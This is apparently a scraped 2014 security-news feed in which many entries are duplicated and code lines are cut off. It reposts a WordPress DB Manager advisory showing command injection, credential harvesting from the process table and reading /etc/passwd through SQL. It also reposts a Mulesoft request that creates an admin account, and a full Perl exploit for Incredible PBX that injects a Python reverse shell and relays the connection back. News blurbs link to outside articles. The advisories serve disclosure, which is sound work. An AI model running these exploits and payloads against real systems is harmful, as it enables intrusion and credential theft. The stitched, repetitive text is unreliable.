Title: Vulnerabilities in WordPress Database Manager v2.7.1
Author: Larry W. Cashdollar, @_larry0
Date: 10/13/2014
Download: https://wordpress.org/plugins/
Downloads: 1,171,358
Vendor: Lester Chan, https://profiles.wordpress.
Contacted: 10/13/2014, Vulnerabilities addressed in v2.7.2.
Full Advisory: http://www.vapid.dhs.org/
CVE: 2014-8334,2014-8335
OSVDBID: 113508,113507,113509
Description: "Allows you to optimize database, repair database, backup database, restore database, delete backup database , drop/empty tables and run selected queries. Supports automatic scheduling of backing up, optimizing and repairing of database."
Vulnerability: Plugin suffers from command injection, exposes MySQL database credentials to the process table and allows the user to download system files via the ‘Run SQL Query’ feature. User authentication with current_user_can('manage_
PoC
Command Injection
The command that is sent through passthru() is the following:
/usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere"
--default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-
rce is just a homebrew .c binary I wrote for testing command injections it creates a file
in /tmp with some stats on who executed it.
# cat /tmp/RCE_JChl9c
ARGGHHH I've been executed! my pid is :16169 Parent id 16168
Name: sh
State: S (sleeping)
Tgid: 16168
Pid: 16168
PPid: 15925
TracerPid: 0
Uid: 33 33 33 33
Gid: 33 33 33 33
FDSize: 32
Groups: 33
In the following lines commands can be injected into the variables being used to build
the command by using ;command;
$backup['filepath']
$backup['mysqldumppath']
I use $backup[‘filepath’] or “Path To Backup:” for my PoC.
/usr/share/wordpress/wp-
Saving and then Running a backup executes /usr/bin/rce, the command that is sent through passthru() is the following:
/usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere"
--default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-
rce is just a homebrew .c binary I wrote for testing command injections, it creates a file
in /tmp with some stats on who executed it.
# cat /tmp/RCE_JChl9c
ARGGHHH I've been executed! my pid is :16169 Parent id 16168
Name: sh
State: S (sleeping)
Tgid: 16168
Pid: 16168
PPid: 15925
TracerPid: 0
Uid: 33 33 33 33
Gid: 33 33 33 33
FDSize: 32
Groups: 33
Mysql Credentials Leaked to Process Table
Also by running a simple script:
PoC:
$ while (true); do echo -n `ps ax | grep m[y]sqldump`; done
6324 ? S 0:00 sh -c /usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" --default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-
A malicious local user can harvest credentials for the mysql database off the process table.
The trouble is the code doesn’t properly sanitize user input and is being passed directly to passthru or system depending on which OS you’re using.
In wp-dbmanager.php:
86 $backup['command'] = '';
87 $brace = (substr(PHP_OS, 0, 3) == 'WIN') ? '"' : '';
88 if(intval($backup_options['
89 $backup['filename'] = $backup['date'].'_-_'.DB_NAME.
90 $backup['filepath'] = $backup['path'].'/'.$backup['
91 $backup['command'] = $brace.$backup['mysqldumppath'
92 } else {
93 $backup['filename'] = $backup['date'].'_-_'.DB_NAME.
94 $backup['filepath'] = $backup['path'].'/'.$backup['
95 $backup['command'] = $brace.$backup['mysqldumppath'
96 }
97 execute_backup($backup['
211 ### Executes OS-Dependent mysqldump Command (By: Vlad Sharanhovich)
212 function execute_backup($command) {
213 $backup_options = get_option('dbmanager_options'
214 check_backup_files();
215 if(substr(PHP_OS, 0, 3) == 'WIN') {
216 $writable_dir = $backup_options['path'];
217 $tmpnam = $writable_dir.'/wp-dbmanager.
218 $fp = fopen($tmpnam, 'w');
219 fwrite($fp, $command);
220 fclose($fp);
221 system($tmpnam.' > NUL', $error);
222 unlink($tmpnam);
223 } else {
224 passthru($command, $error);
225 }
226 return $error;
227 }
In database-manage.php:
46 if(stristr($database_file, '.gz')) {
47 $backup['command'] = 'gunzip < '.$brace.$backup['path'].'/'.$
48 } else {
49 $backup['command'] = $brace.$backup['mysqlpath'].$
50 }
51 passthru($backup['command'], $error);
File Downloads
In the ‘Sql Run Query’ Panel only a few queries are allowed (Use Only INSERT, UPDATE, REPLACE, DELETE, CREATE and ALTER statements.) but these are suffiecient to download sensitive system files:
CREATE TABLE password (passwords varchar(8096));
INSERT into password (passwords) VALUES(LOAD_FILE(‘/etc/passwd’
Then run a database backup, and download the backup file or send via email.
From 1413409573_-_wordpress.sql:
INSERT INTO `password` VALUES ('root:x:0:0:root:/root:/bin/
/*!40000 ALTER TABLE `password` ENABLE KEYS */;
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
Author: Larry W. Cashdollar, @_larry0
Date: 10/13/2014
Download: https://wordpress.org/plugins/
Downloads: 1,171,358
Vendor: Lester Chan, https://profiles.wordpress.
Contacted: 10/13/2014, Vulnerabilities addressed in v2.7.2.
Full Advisory: http://www.vapid.dhs.org/
CVE: 2014-8334,2014-8335
OSVDBID: 113508,113507,113509
Description: "Allows you to optimize database, repair database, backup database, restore database, delete backup database , drop/empty tables and run selected queries. Supports automatic scheduling of backing up, optimizing and repairing of database."
Vulnerability: Plugin suffers from command injection, exposes MySQL database credentials to the process table and allows the user to download system files via the ‘Run SQL Query’ feature. User authentication with current_user_can('manage_
PoC
Command Injection
The command that is sent through passthru() is the following:
/usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere"
--default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-
rce is just a homebrew .c binary I wrote for testing command injections it creates a file
in /tmp with some stats on who executed it.
# cat /tmp/RCE_JChl9c
ARGGHHH I've been executed! my pid is :16169 Parent id 16168
Name: sh
State: S (sleeping)
Tgid: 16168
Pid: 16168
PPid: 15925
TracerPid: 0
Uid: 33 33 33 33
Gid: 33 33 33 33
FDSize: 32
Groups: 33
In the following lines commands can be injected into the variables being used to build
the command by using ;command;
$backup['filepath']
$backup['mysqldumppath']
I use $backup[‘filepath’] or “Path To Backup:” for my PoC.
/usr/share/wordpress/wp-
Saving and then Running a backup executes /usr/bin/rce, the command that is sent through passthru() is the following:
/usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere"
--default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-
rce is just a homebrew .c binary I wrote for testing command injections, it creates a file
in /tmp with some stats on who executed it.
# cat /tmp/RCE_JChl9c
ARGGHHH I've been executed! my pid is :16169 Parent id 16168
Name: sh
State: S (sleeping)
Tgid: 16168
Pid: 16168
PPid: 15925
TracerPid: 0
Uid: 33 33 33 33
Gid: 33 33 33 33
FDSize: 32
Groups: 33
Mysql Credentials Leaked to Process Table
Also by running a simple script:
PoC:
$ while (true); do echo -n `ps ax | grep m[y]sqldump`; done
6324 ? S 0:00 sh -c /usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" --default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-
A malicious local user can harvest credentials for the mysql database off the process table.
The trouble is the code doesn’t properly sanitize user input and is being passed directly to passthru or system depending on which OS you’re using.
In wp-dbmanager.php:
86 $backup['command'] = '';
87 $brace = (substr(PHP_OS, 0, 3) == 'WIN') ? '"' : '';
88 if(intval($backup_options['
89 $backup['filename'] = $backup['date'].'_-_'.DB_NAME.
90 $backup['filepath'] = $backup['path'].'/'.$backup['
91 $backup['command'] = $brace.$backup['mysqldumppath'
92 } else {
93 $backup['filename'] = $backup['date'].'_-_'.DB_NAME.
94 $backup['filepath'] = $backup['path'].'/'.$backup['
95 $backup['command'] = $brace.$backup['mysqldumppath'
96 }
97 execute_backup($backup['
211 ### Executes OS-Dependent mysqldump Command (By: Vlad Sharanhovich)
212 function execute_backup($command) {
213 $backup_options = get_option('dbmanager_options'
214 check_backup_files();
215 if(substr(PHP_OS, 0, 3) == 'WIN') {
216 $writable_dir = $backup_options['path'];
217 $tmpnam = $writable_dir.'/wp-dbmanager.
218 $fp = fopen($tmpnam, 'w');
219 fwrite($fp, $command);
220 fclose($fp);
221 system($tmpnam.' > NUL', $error);
222 unlink($tmpnam);
223 } else {
224 passthru($command, $error);
225 }
226 return $error;
227 }
In database-manage.php:
46 if(stristr($database_file, '.gz')) {
47 $backup['command'] = 'gunzip < '.$brace.$backup['path'].'/'.$
48 } else {
49 $backup['command'] = $brace.$backup['mysqlpath'].$
50 }
51 passthru($backup['command'], $error);
File Downloads
In the ‘Sql Run Query’ Panel only a few queries are allowed (Use Only INSERT, UPDATE, REPLACE, DELETE, CREATE and ALTER statements.) but these are suffiecient to download sensitive system files:
CREATE TABLE password (passwords varchar(8096));
INSERT into password (passwords) VALUES(LOAD_FILE(‘/etc/passwd’
Then run a database backup, and download the backup file or send via email.
From 1413409573_-_wordpress.sql:
INSERT INTO `password` VALUES ('root:x:0:0:root:/root:/bin/
/*!40000 ALTER TABLE `password` ENABLE KEYS */;
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
↧
Spam Campaign Taking Advantage of Ebola Scare May Lead To Malware Infections
Cybercriminals have inevitably taken advantage of the publicization of the Ebola virus in the news for several months. We’ve spotted a couple of malicious spam samples that reference the Ebola virus in the last week.
more here...........http://blog.spiderlabs.com/2014/10/spam-campaign-taking-advantage-of-ebola-scare-may-lead-to-malware-infections.html
more here...........http://blog.spiderlabs.com/2014/10/spam-campaign-taking-advantage-of-ebola-scare-may-lead-to-malware-infections.html
↧
↧
Mulesoft ESB Authenticated Privilege Escalation
Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation → Remote Code
Execution
Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to
create an administrator user due to a lack of permissions check in the
handler/securityService.rpc endpoint. The following HTTP request can be
made by any authenticated user, even those with a single role of Monitor.
POST /mmc-3.5.1/handler/
Host: 192.168.0.22:8585
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0)
Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8/
Referer: http://192.168.0.22:8585/mmc-
Content-Length: 503
Cookie: JSESSIONID=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
7|0|15|http://192.168.0.22:
|
fdsafdsa@fdsafdsa.com
|java.util.ArrayList/4159755760|
This request will create an administrator with all roles with a username
of notadmin and a password of notpassword. Many vectors of remote code
execution are available to an administrator. Not only can an administrator
deploy WAR applications, they can also evaluate arbitrary groovy scripts
via the web interface.
Authored by Brandon Perry
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
Execution
Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to
create an administrator user due to a lack of permissions check in the
handler/securityService.rpc endpoint. The following HTTP request can be
made by any authenticated user, even those with a single role of Monitor.
POST /mmc-3.5.1/handler/
Host: 192.168.0.22:8585
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0)
Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8/
Referer: http://192.168.0.22:8585/mmc-
Content-Length: 503
Cookie: JSESSIONID=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
7|0|15|http://192.168.0.22:
|
fdsafdsa@fdsafdsa.com
|java.util.ArrayList/4159755760|
This request will create an administrator with all roles with a username
of notadmin and a password of notpassword. Many vectors of remote code
execution are available to an administrator. Not only can an administrator
deploy WAR applications, they can also evaluate arbitrary groovy scripts
via the web interface.
Authored by Brandon Perry
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
↧
The Details Behind the Akeeba Backup Vulnerability
It’s been a month since our disclosure of a low-severity vulnerability affecting Akeeba Backup version 3.11.4, which allowed an attacker to list and download backups from a target website using the extension’s JSON API. As promised, here’s the technical details describing how it was possible for us to send valid requests to the API and download our test website’s database and file backups.
more here..........http://blog.sucuri.net/2014/10/the-details-behind-the-akeeba-backup-vulnerability.html
more here..........http://blog.sucuri.net/2014/10/the-details-behind-the-akeeba-backup-vulnerability.html
↧
Incredible PBX remote command execution exploit
#!/usr/bin/perl
#
# Title: Incredible PBX remote command execution exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered: 1 September 2014
# Coded: 21 October 2014
# Published: 21 October 2014
# MorXploit Research
# http://www.MorXploit.com
# Vendor: PBX in a Flash
# Vendor url: http://pbxinaflash.net/
# Software: Incredible PBX 11
# Version: 2.0.6.5.0
# Product url: http://incrediblepbx.com/
# Download: http://nerdvittles.
# Vulnerable file: reminders/index.php
#
# About (from their website):
# Incredible PBX is a secure and feature-rich implementation of the terrific Asterisk® PBX. By rethinking the PBX security model from the
# ground up, Incredible PBX was engineered to provide rock-solid security while delivering the most comprehensive collection of Asterisk
# utilities available on the planet including free calling in the U.S. and Canada courtesy of Google Voice.
#
# Description:
# reminders/index.php which ships with Incredible PBX suffers from a command execution vulnerability, allowing an authenticated user to
# inject commands as the asterisk user.
#
# Vulnerable code:
# 484: system $retcode3 = system("sox $tmpwave -r 8000 -c 1 $newgsm");
# 472: $tmpwave = "/tmp/$token.wav";
# 469: $token = md5(uniqid(""));
# 483: $newgsm = "/var/lib/asterisk/sounds/
# 381: $APPTTIME = str_replace(array(chr(13), chr(10), "<", ">"), "", $APPTTIME);
# 375: $APPTTIME = $_REQUEST['APPTHR'] . $_REQUEST['APPTMIN'];
# 380: $APPTDT = str_replace(array(chr(13), chr(10), "<", ">"), "", $APPTDT);
# 374: $APPTDT = $_REQUEST['APPTYR'] . $_REQUEST['APPTMO'] . $_REQUEST['APPTDA'];
# 382: $APPTPHONE = str_replace(array(chr(13), chr(10), "<", ">", " ", "(", ")", "-", "."), "", $APPTPHONE);
# 376: $APPTPHONE = $_REQUEST['APPTPHONE'];
#
# As you can see, none of user input sent through $_REQUEST[] parameters is being validated/sanitized before being passed it to system();
#
# Exploit:
# As PoC, the below perl code will try to exploit $_REQUEST['APPTMIN'] to inject a python connect back shell.
#
# Note:
# Access to reminders/index.php requires 'maint' password, in the exploit code we have used the default installation password which is
# 'password'.
#
# Demo:
# ==============================
# --- Incredible PBX remote command execution exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ==============================
# [*] MorXploiting http://10.0.0.20/reminders/
# [+] Sent payload! Waiting for connect back shell ...
# sh: no job control in this shell
# sh-4.1$ id; cat /etc/issue
# id; cat /etc/issue
# uid=498(asterisk) gid=497(asterisk) groups=497(asterisk)
# CentOS release 6.5 (Custom) on \m
# Welcome to PBX in a Flash - Green
# Please log in to continue
# ******************************
# Your IP Address is:
#
# 10.0.0.20
# ******************************
#
# Download:
# http://www.morxploit.com/
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
use LWP::UserAgent;
use MIME::Base64;
use IO::Socket;
use strict;
sub banner {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "=============================
print "--- Incredible PBX remote command execution exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "=============================
}
if (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2])) {
banner();
print "perl $0 <target> <connectbackIP> <connectbackport>\n";
print "perl $0 http://10.0.0.16 10.0.0.2 31337\n";
exit;
}
my $host = $ARGV[0];
my $vuln = "reminders/index.php";
my $cbhost = $ARGV[1];
my $cbport = $ARGV[2];
my $defuser = "maint"; # Default maint user
my $defpass = "password"; # Default maint pass
my $string = "$defuser:$defpass";
my $host2 = "http://localhost:81";
my $encoded = encode_base64($string);
$| = 1;
$SIG{CHLD} = 'IGNORE';
my $l_sock = IO::Socket::INET->new(
Proto => "tcp",
LocalPort => "$cbport",
Listen => 1,
LocalAddr => "0.0.0.0",
Reuse => 1,
) or die "[-] Could not listen on $cbport: $!\n";
sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
my $useragent = randomagent();
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$vuln", Authorization => "Basic $encoded");
unless ($status->is_success) {
banner();
print "[-] Error: " . $status->status_line . "\n";
exit;
}
banner();
print "[*] MorXploiting $host/$vuln\n";
my $payload = "python -c 'import socket,subprocess,os;s=socket.
my $get = "APPTDA=morx&APPTPHONE=morx&
my $exploit = $ua->get("$host/$vuln?$get", Authorization => "Basic $encoded");
print "[+] Sent payload! Waiting for connect back root shell ...\n";
my $a_sock = $l_sock->accept();
$l_sock->shutdown(SHUT_RDWR);
copy_data_bidi($a_sock);
sub copy_data_bidi {
my ($socket) = @_;
my $child_pid = fork();
if (! $child_pid) {
close(STDIN);
copy_data_mono($socket, *STDOUT);
$socket->shutdown(SHUT_RD);
exit();
} else {
close(STDOUT);
copy_data_mono(*STDIN, $socket);
$socket->shutdown(SHUT_WR);
kill("TERM", $child_pid);
}
}
sub copy_data_mono {
my ($src, $dst) = @_;
my $buf;
while (my $read_len = sysread($src, $buf, 4096)) {
my $write_len = $read_len;
while ($write_len) {
my $written_len = syswrite($dst, $buf);
return unless $written_len;
$write_len -= $written_len;
}
}
}
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
#
# Title: Incredible PBX remote command execution exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered: 1 September 2014
# Coded: 21 October 2014
# Published: 21 October 2014
# MorXploit Research
# http://www.MorXploit.com
# Vendor: PBX in a Flash
# Vendor url: http://pbxinaflash.net/
# Software: Incredible PBX 11
# Version: 2.0.6.5.0
# Product url: http://incrediblepbx.com/
# Download: http://nerdvittles.
# Vulnerable file: reminders/index.php
#
# About (from their website):
# Incredible PBX is a secure and feature-rich implementation of the terrific Asterisk® PBX. By rethinking the PBX security model from the
# ground up, Incredible PBX was engineered to provide rock-solid security while delivering the most comprehensive collection of Asterisk
# utilities available on the planet including free calling in the U.S. and Canada courtesy of Google Voice.
#
# Description:
# reminders/index.php which ships with Incredible PBX suffers from a command execution vulnerability, allowing an authenticated user to
# inject commands as the asterisk user.
#
# Vulnerable code:
# 484: system $retcode3 = system("sox $tmpwave -r 8000 -c 1 $newgsm");
# 472: $tmpwave = "/tmp/$token.wav";
# 469: $token = md5(uniqid(""));
# 483: $newgsm = "/var/lib/asterisk/sounds/
# 381: $APPTTIME = str_replace(array(chr(13), chr(10), "<", ">"), "", $APPTTIME);
# 375: $APPTTIME = $_REQUEST['APPTHR'] . $_REQUEST['APPTMIN'];
# 380: $APPTDT = str_replace(array(chr(13), chr(10), "<", ">"), "", $APPTDT);
# 374: $APPTDT = $_REQUEST['APPTYR'] . $_REQUEST['APPTMO'] . $_REQUEST['APPTDA'];
# 382: $APPTPHONE = str_replace(array(chr(13), chr(10), "<", ">", " ", "(", ")", "-", "."), "", $APPTPHONE);
# 376: $APPTPHONE = $_REQUEST['APPTPHONE'];
#
# As you can see, none of user input sent through $_REQUEST[] parameters is being validated/sanitized before being passed it to system();
#
# Exploit:
# As PoC, the below perl code will try to exploit $_REQUEST['APPTMIN'] to inject a python connect back shell.
#
# Note:
# Access to reminders/index.php requires 'maint' password, in the exploit code we have used the default installation password which is
# 'password'.
#
# Demo:
# ==============================
# --- Incredible PBX remote command execution exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ==============================
# [*] MorXploiting http://10.0.0.20/reminders/
# [+] Sent payload! Waiting for connect back shell ...
# sh: no job control in this shell
# sh-4.1$ id; cat /etc/issue
# id; cat /etc/issue
# uid=498(asterisk) gid=497(asterisk) groups=497(asterisk)
# CentOS release 6.5 (Custom) on \m
# Welcome to PBX in a Flash - Green
# Please log in to continue
# ******************************
# Your IP Address is:
#
# 10.0.0.20
# ******************************
#
# Download:
# http://www.morxploit.com/
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
use LWP::UserAgent;
use MIME::Base64;
use IO::Socket;
use strict;
sub banner {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "=============================
print "--- Incredible PBX remote command execution exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "=============================
}
if (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2])) {
banner();
print "perl $0 <target> <connectbackIP> <connectbackport>\n";
print "perl $0 http://10.0.0.16 10.0.0.2 31337\n";
exit;
}
my $host = $ARGV[0];
my $vuln = "reminders/index.php";
my $cbhost = $ARGV[1];
my $cbport = $ARGV[2];
my $defuser = "maint"; # Default maint user
my $defpass = "password"; # Default maint pass
my $string = "$defuser:$defpass";
my $host2 = "http://localhost:81";
my $encoded = encode_base64($string);
$| = 1;
$SIG{CHLD} = 'IGNORE';
my $l_sock = IO::Socket::INET->new(
Proto => "tcp",
LocalPort => "$cbport",
Listen => 1,
LocalAddr => "0.0.0.0",
Reuse => 1,
) or die "[-] Could not listen on $cbport: $!\n";
sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
my $useragent = randomagent();
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$vuln", Authorization => "Basic $encoded");
unless ($status->is_success) {
banner();
print "[-] Error: " . $status->status_line . "\n";
exit;
}
banner();
print "[*] MorXploiting $host/$vuln\n";
my $payload = "python -c 'import socket,subprocess,os;s=socket.
my $get = "APPTDA=morx&APPTPHONE=morx&
my $exploit = $ua->get("$host/$vuln?$get", Authorization => "Basic $encoded");
print "[+] Sent payload! Waiting for connect back root shell ...\n";
my $a_sock = $l_sock->accept();
$l_sock->shutdown(SHUT_RDWR);
copy_data_bidi($a_sock);
sub copy_data_bidi {
my ($socket) = @_;
my $child_pid = fork();
if (! $child_pid) {
close(STDIN);
copy_data_mono($socket, *STDOUT);
$socket->shutdown(SHUT_RD);
exit();
} else {
close(STDOUT);
copy_data_mono(*STDIN, $socket);
$socket->shutdown(SHUT_WR);
kill("TERM", $child_pid);
}
}
sub copy_data_mono {
my ($src, $dst) = @_;
my $buf;
while (my $read_len = sysread($src, $buf, 4096)) {
my $write_len = $read_len;
while ($write_len) {
my $written_len = syswrite($dst, $buf);
return unless $written_len;
$write_len -= $written_len;
}
}
}
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
↧
Paper: DNS Resolvers Considered Harmful
The Domain Name System (DNS) is a critical component of the Internet infrastructure. However---as with many components of Internet technology---DNS has numerous vulnerabilities. In particular, shared DNS resolvers are a notorious security weak spot in the system. In this paper we propose an unorthodox approach for tackling both known and unknown vulnerabilities within shared DNS resolvers: removing shared DNS resolvers entirely and pushing their tasks on clients. We show that the two primary costs of this approach---loss of performance and an increase in system load---are modest and therefore conclude that this approach is beneficial for strengthening the overall name resolution process by reducing the attack surface of the DNS.
more here.............http://www.icir.org/mallman/pubs/SAR14/SAR14.pdf
more here.............http://www.icir.org/mallman/pubs/SAR14/SAR14.pdf
↧
↧
Cyber-criminals quickly adopt critical Flash Player vulnerability
Keeping your computer up-to-date is probably one of the best pieces of advice one can give when it comes to online security.
Perhaps it should also be emphasized that patches ought to be applied in a timely fashion.
Case in point, less than a week ago, a critical flaw in the Flash Player (CVE-2014-0569) was patched and made public
more here..........https://blog.malwarebytes.org/exploits-2/2014/10/cyber-criminals-quickly-adopt-critical-flash-player-vulnerability/
Perhaps it should also be emphasized that patches ought to be applied in a timely fashion.
Case in point, less than a week ago, a critical flaw in the Flash Player (CVE-2014-0569) was patched and made public
more here..........https://blog.malwarebytes.org/exploits-2/2014/10/cyber-criminals-quickly-adopt-critical-flash-player-vulnerability/
↧
U.S. government probes medical devices for possible cyber flaws
The U.S. Department of Homeland Security is investigating about two dozen cases of suspected cybersecurity flaws in medical devices and hospital equipment that officials fear could be exploited by hackers, a senior official at the agency told Reuters.
more here...........http://www.reuters.com/article/2014/10/22/us-cybersecurity-medicaldevices-insight-idUSKCN0IB0DQ20141022
more here...........http://www.reuters.com/article/2014/10/22/us-cybersecurity-medicaldevices-insight-idUSKCN0IB0DQ20141022
↧
Pangu jailbreak installs unlicensed code on millions of devices
For years iPhone jailbreaking has been a very controversial topic. Considered illegal by some including the vendor, customers had to fight in court to get a DCMA exception that finally ruled iPhone jailbreaking legal. However jailbreaking is still considered shady and many believe that the primary purpose of jailbreaking is to install pirated software copies. At the same time the jailbreaking community is trying hard to fight this stigma and jailbreak release groups like The iPhone Dev Team, Chronic-dev teams and finally the evad3rs tried their best to provide jailbreaking software that was clean from 3rd party code that would infringe on other people's copyright.
This all changed about five months ago, when a team of Chinese called PanguTeam released a shady jailbreak that relied on enterprise code-signing certificates, used vulnerabilities that were shared with them in the confidence that they would not be leaked and installed the 25pp app store that allegedly supports software piracy. But not only that they also took our code, incorporated it into their untether and distributed it to millions of iDevices without having a license that would allow this.
more here.............http://www.sektioneins.de/en/blog/14-10-23-pangu-installs-unlicensed-code.html
This all changed about five months ago, when a team of Chinese called PanguTeam released a shady jailbreak that relied on enterprise code-signing certificates, used vulnerabilities that were shared with them in the confidence that they would not be leaked and installed the 25pp app store that allegedly supports software piracy. But not only that they also took our code, incorporated it into their untether and distributed it to millions of iDevices without having a license that would allow this.
more here.............http://www.sektioneins.de/en/blog/14-10-23-pangu-installs-unlicensed-code.html
↧
Tracking a Bitcoin Thief pt. I: The Philippine Connection and the Truth behind CryptoRush.in
For the last two years the crypto currency scene had exploded in size as people began learning about and participating in Bitcoin and its alternate currencies. Altcoins as people call them are smaller projects that can be mined and often traded directly for Bitcoin by miners who can not afford to mine Bitcoin directly. With this uprising of alternate currencies came the rise of many Exchanges; sites that provided a platform and medium for supporters, miners and traders of these projects to buy/sell/trade these currencies.
One of these altcoin exchanges was CryptoRush.in; a site dedicated to providing a fast paced medium for users to trade brand new crypto currencies which were traded at exchanges sometimes less than an hour after they were released. Unfortunately CryptoRush suffered a series of break-ins that crushed many members of the community but also provided an opportunity for us at BITCOMSEC to research, analyse evidence and track down the perpetrators. This article details over 7 months of logs, evidence and research that we have looked at to pinpoint exactly what happened at CryptoRush, its owners and who did walk away with all that money...
more here...........https://bitcomsec.true.io/
One of these altcoin exchanges was CryptoRush.in; a site dedicated to providing a fast paced medium for users to trade brand new crypto currencies which were traded at exchanges sometimes less than an hour after they were released. Unfortunately CryptoRush suffered a series of break-ins that crushed many members of the community but also provided an opportunity for us at BITCOMSEC to research, analyse evidence and track down the perpetrators. This article details over 7 months of logs, evidence and research that we have looked at to pinpoint exactly what happened at CryptoRush, its owners and who did walk away with all that money...
more here...........https://bitcomsec.true.io/
↧
↧
Why Samsung Knox isn't really a Fort Knox
Samsung phones, like the Samsung Galaxy S4, are shipped with a preinstalled version of Samsung Knox. Samsung advertises Knox with the following:
"KNOX Workspace container improves the user experience, providing security for enterprise data by creating a secure zone in the employee’s device for corporate applications, and encrypting enterprise data both at rest and in motion. KNOX Workspace container provides users with an isolated and secure environment within the mobile device, complete with its own home screen, launcher, applications and widgets for easier, more intuitive and safe operation. Applications and data inside the container are separated."
